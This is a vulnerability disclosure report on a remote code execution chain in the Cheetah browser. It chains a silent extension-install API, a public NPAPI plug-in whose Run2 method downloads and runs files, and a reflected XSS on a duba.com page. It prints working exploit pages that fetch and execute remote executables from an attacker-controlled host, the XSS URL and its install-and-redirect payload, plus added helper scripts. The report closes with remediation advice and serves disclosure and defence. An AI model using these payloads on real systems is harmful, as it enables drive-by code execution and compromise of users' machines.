Remote code execution in the Cheetah Browser
1. Download the latest version of the Cheetah Browser: KSbrowser_5.2.85.9616.exe
2. By analysing some of the custom function interfaces implemented by Cheetah (a number of APIs under the external object), I found that Jinshan exposes the following API:
external.NativeInstallExtensions(["fpmcdbknonpdbngoboglidihcbfjcaep"]);
fpmcdbknonpdbngoboglidihcbfjcaep is the application ID in the Cheetah browser market.
Any website under liebao.cn or duba.com is permitted to call this function, and it silently installs any plug-in from the application market (that is, the user sees no prompt when the plug-in is installed).
3. How can I use this API for a silent plug-in installation? I can think of the following scenarios:
A. Write a malicious plug-in and upload it to the application market (it is subject to official review).
B. Find an existing plug-in with a functional defect that can be exploited once it has been silently installed. This splits into two cases:
B1. The plug-in's pages have an XSS. Since CSP (content_security_policy) is usually enabled on plug-in pages, this is difficult to exploit, and even where the XSS works, getting from script execution inside the plug-in to command execution is still relatively hard.
B2. The plug-in package bundles an NPAPI plug-in whose public attribute is set to true. Then we only need to install the plug-in silently, and any page can call the interfaces the NPAPI plug-in exposes; as long as one of those functions has a security defect, it can be abused further.
4. Based on the above analysis, we went to the Cheetah application market to screen plug-ins, paying particular attention to words such as "download" and "start". Finally we found the following application:
5. After installing this plug-in, we found that it bundles a DLL and that its public attribute is true, so it can be called from any page.
However, we did not know how this DLL is used.
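The screening in steps 3 (case B2) to 5 can be done mechanically over the manifest.json of each market extension. The following Node.js script is an added example, not code from this report, from Cheetah or from any market extension: it flags NPAPI plug-ins declared with "public": true (scriptable from any web page), notes a permissive content_security_policy, and marks download/launch wording. The manifests are constructed test data; the extension names and DLL paths are invented, and the assumption that Cheetah uses Chrome's manifest format (the "plugins" list with a "public" flag) is mine.

```javascript
// Added example, not from the original report: triage Chrome-style extension
// manifests for the pattern described above. Sample manifests are constructed.

const SUSPICIOUS_WORDS = ['download', 'start', 'launch', 'run', 'exec', 'install'];

// Return a list of findings for one parsed manifest object.
function auditManifest(manifest) {
  const findings = [];
  const plugins = Array.isArray(manifest.plugins) ? manifest.plugins : [];

  for (const plugin of plugins) {
    if (!plugin || typeof plugin.path !== 'string') continue;
    if (plugin.public === true) {
      // "public" defaults to false; true means ordinary web pages may embed and script it.
      findings.push({ severity: 'high', path: plugin.path,
        reason: 'NPAPI plug-in is public: any web page can call its methods' });
    } else {
      findings.push({ severity: 'info', path: plugin.path,
        reason: 'NPAPI plug-in is private: only extension pages can reach it' });
    }
  }

  const csp = manifest.content_security_policy;
  if (typeof csp !== 'string' || csp.length === 0) {
    // Chrome applies a default CSP (script-src 'self'; object-src 'self') to manifest v2
    // extension pages when none is declared; that Cheetah does the same is an assumption.
    findings.push({ severity: 'info', reason: 'no explicit content_security_policy, default applies' });
  } else if (/unsafe-(eval|inline)/.test(csp)) {
    findings.push({ severity: 'medium',
      reason: 'content_security_policy allows ' + csp.match(/unsafe-(eval|inline)/)[0] });
  }

  const text = [manifest.name, manifest.description].filter(Boolean).join(' ').toLowerCase();
  const words = SUSPICIOUS_WORDS.filter((w) => text.includes(w));
  if (words.length) {
    findings.push({ severity: 'low', reason: 'wording suggests launching software: ' + words.join(', ') });
  }

  const hasPublicNpapi = findings.some((f) => f.severity === 'high');
  return { name: manifest.name, hasPublicNpapi, findings };
}

// Rank a set of manifests so that public NPAPI plug-ins come first.
function prioritize(manifests) {
  const order = { high: 0, medium: 1, low: 2, info: 3 };
  const score = (r) => Math.min(...r.findings.map((f) => order[f.severity]), 4);
  return manifests.map(auditManifest).sort((a, b) => score(a) - score(b));
}

// Constructed manifests (hypothetical extensions, not real market entries).
const SAMPLE_MANIFESTS = [
  { name: 'Meeting Client Loader', description: 'Downloads and starts the desktop client',
    version: '1.0', manifest_version: 2,
    plugins: [{ path: 'loader.dll', public: true }] },
  { name: 'Private Helper', version: '1.0', manifest_version: 2,
    content_security_policy: "script-src 'self'; object-src 'self'",
    plugins: [{ path: 'helper.dll', public: false }] },
  { name: 'Plain Web Extension', version: '1.0', manifest_version: 2,
    content_security_policy: "script-src 'self'; object-src 'self'" },
];

for (const r of prioritize(SAMPLE_MANIFESTS)) {
  console.log(r.name + (r.hasPublicNpapi ? '  [PUBLIC NPAPI]' : ''));
  for (const f of r.findings) console.log('  ' + f.severity + ': ' + f.reason);
}
```

Run it over the unpacked manifest.json of every extension downloaded from the market; anything ranked high is a candidate for the DLL method review in steps 5 to 7, since a public plug-in with a download-and-run method is exactly the primitive this report chains.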
6. I searched for the official FSMeeting website and demo. After opening the official demo site, I waited for a while, and then found that the "havip" software had been installed on my computer automatically. So the plug-in has a silent installation function; I checked the source code and found the following code in it.
7. It is not difficult to see that the Run2 function is a download-and-execute API, so it is easy to write the following code.
<!-- Embed the FSMeeting loader NPAPI plug-in; because the extension marks it public, this page may script it -->
<embed pluginspage='http://www.fsmeeting.com/download/fmloader.xpi' id='fx_ClientLoader' type='application/npcltloader-plugin' hidden='true' width='1' height='1'/>
<script>
var NodeManAddr="TCP:fsmeeting.com:1089;";
var userType="0";
var GroupName="Fastonz";
var ProductName="FMDesktop";
var ClientName="FMDesktop";
// Command-line parameters the loader passes to the client it starts
var room_para="-link"+" " + NodeManAddr + " "+"-rid"+" "+'' + " " + "-uname" + " "+''+" "+"-utype"+" "+userType;
// Attacker-controlled URL: Run2 downloads this file and runs it
var downloadurl="http://x.com/testbaidu.exe";
window.onload=function(){
  document.getElementById("fx_ClientLoader").Run2(downloadurl,GroupName,ProductName,room_para);
}
</script>
This code downloads x.com/testbaidu.exe and executes it.
8. As the previous figure shows, a plug-in marked public can be called from any page. With that, the command execution chain is complete:
Use an XSS under liebao.cn or duba.com to call external.NativeInstallExtensions(["fpmcdbknonpdbngoboglidihcbfjcaep"]); and silently install the plug-in.
Then create an .htm page that calls the havip plug-in's function to download and execute a remote exe.
---------------------------------------------------------------------
The XSS is as follows:
http://tuan.duba.com/category/?city_code=\u0022\u003e\u003cimg%20src=1%20onerror=alert\u00281\u0029\u003e&cateid=4&f=qrj2015
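The city_code value in that URL is written entirely as JavaScript Unicode escapes (\u0022 is a double quote, \u003c and \u003e are angle brackets), which is the form that survives a filter looking for HTML metacharacters when the parameter is reflected inside a JavaScript string literal and later written into the page. That reflection context is my inference from the shape of the payload; the report only gives the URL. The script below is an added example, not part of the report: it pulls the parameter out of the URL above, shows that a naive HTML-only filter would pass it, and decodes it the way the JavaScript parser would, yielding the live markup.

```javascript
// Added example, not from the original report: decode the escaped XSS payload
// from the URL quoted above and show why it slips past an HTML-only filter.
// The reflection context (inside a JS string literal) is an assumption.

const XSS_URL = String.raw`http://tuan.duba.com/category/?city_code=\u0022\u003e\u003cimg%20src=1%20onerror=alert\u00281\u0029\u003e&cateid=4&f=qrj2015`;

// Extract one query parameter (percent-decoded, backslashes kept as received).
function getParam(url, name) {
  return new URL(url).searchParams.get(name) || '';
}

// A naive server-side filter that only looks for HTML metacharacters sees none.
function naiveHtmlFilterPasses(value) {
  return !/[<>"']/.test(value);
}

// What the JavaScript parser produces when the value sits inside a string literal:
// every \uXXXX escape becomes the character it names.
function decodeJsEscapes(value) {
  return value.replace(/\\u([0-9a-fA-F]{4})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Simulate the reflection: the server embeds the raw value in a script, the browser
// evaluates it, and a later write of that string into the document turns it into markup.
function simulateReflection(value) {
  const raw = value;
  const runtime = decodeJsEscapes(raw);
  return {
    raw,
    runtime,
    filterPasses: naiveHtmlFilterPasses(raw),
    becomesMarkup: /<\w+[^>]*onerror=/i.test(runtime),
  };
}

const result = simulateReflection(getParam(XSS_URL, 'city_code'));
console.log('raw parameter :', result.raw);
console.log('filter passes :', result.filterPasses);
console.log('runtime value :', result.runtime);
console.log('live markup   :', result.becomesMarkup);
```

The decoded string is what ends up in the DOM, and its onerror handler is where the external.NativeInstallExtensions call from the next step is placed.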
Use the XSS to run the following, which installs the havip plug-in and then redirects to liebao1.htm:
external.NativeInstallExtensions(["fpmcdbknonpdbngoboglidihcbfjcaep"]);
setTimeout(function(){location.href="http://xsst.sinaapp.com/poc/liebao1.htm";},1500);
The code of http://xsst.sinaapp.com/poc/liebao1.htm, which downloads and executes calc.exe, is as follows:
<!-- Embed the FSMeeting loader NPAPI plug-in that the silent install just made available -->
<embed pluginspage='http://www.fsmeeting.com/download/fmloader.xpi' id='fx_ClientLoader' type='application/npcltloader-plugin' hidden='true' width='1' height='1'/>
<script>
var NodeManAddr="TCP:fsmeeting.com:1089;";
var userType="0";
var GroupName="Fastonz";
var ProductName="FMDesktop";
var ClientName="FMDesktop";
// Command-line parameters the loader passes to the client it starts
var room_para="-link"+" " + NodeManAddr + " "+"-rid"+" "+'' + " " + "-uname" + " "+''+" "+"-utype"+" "+userType;
// Proof-of-concept payload: Run2 downloads this file and runs it
var downloadurl="http://xsst.sinaapp.com/poc/calc.exe";
window.onload=function(){
  document.getElementById("fx_ClientLoader").Run2(downloadurl,GroupName,ProductName,room_para);
}
</script>
1. On Windows 7 (with UAC either enabled or disabled), visit http://xsst.sinaapp.com/poc/liebao2.htm.
This page jumps to the XSS and installs "havip".
2. After installation, the page redirects to http://xsst.sinaapp.com/poc/liebao1.htm after 1.5 seconds, which downloads and executes the payload, as shown below:
Solution:
1. Change the silent installation function so that the user is prompted to confirm before a plug-in is installed.
2. Review applications in the application market that bundle NPAPI plug-ins more rigorously, especially those marked public.